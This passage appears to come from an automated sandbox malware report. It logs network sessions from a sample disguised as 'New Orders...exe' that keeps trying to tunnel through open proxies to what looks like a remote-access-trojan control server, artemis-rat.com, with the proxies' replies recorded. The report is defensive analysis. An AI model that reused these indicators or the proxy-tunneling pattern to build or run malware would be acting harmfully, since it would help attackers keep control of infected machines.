                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        126192.168.2.950161138.36.150.1610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.154417038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        127192.168.2.950183223.19.111.185807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.156354904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.835611105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.788657904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.773408890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668123960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.570225000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.461128950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.546304941 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        128192.168.2.95019846.35.9.110807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.156505108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.454441071 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        129192.168.2.950238174.64.199.8241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.156698942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        130192.168.2.950203161.97.74.176300007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.160136938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.468842030 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        131192.168.2.95023643.129.228.4678917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.161377907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        132192.168.2.950194193.239.56.8480817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.162895918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        133192.168.2.95011862.171.133.6631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.162919998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.007441998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.589764118 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        134192.168.2.950349104.25.167.88807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.163527966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.318072081 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        135192.168.2.95020691.189.177.18631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.164609909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.488017082 CET1286INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/5.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3628
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from lb1
                                                                                        X-Cache-Lookup: NONE from lb1:3128
                                                                                        Via: 1.1 lb1 (squid/5.7)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        136192.168.2.950090111.59.4.8890027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.164823055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.566139936 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        137192.168.2.950218103.151.20.131807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.168169975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.879479885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.945282936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.132802963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.260796070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445600986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.538940907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.742456913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.132519007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        138192.168.2.9502228.222.239.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.170253992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        139192.168.2.95048793.190.24.1194437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.171616077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        140192.168.2.95049393.190.24.1194437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.173466921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
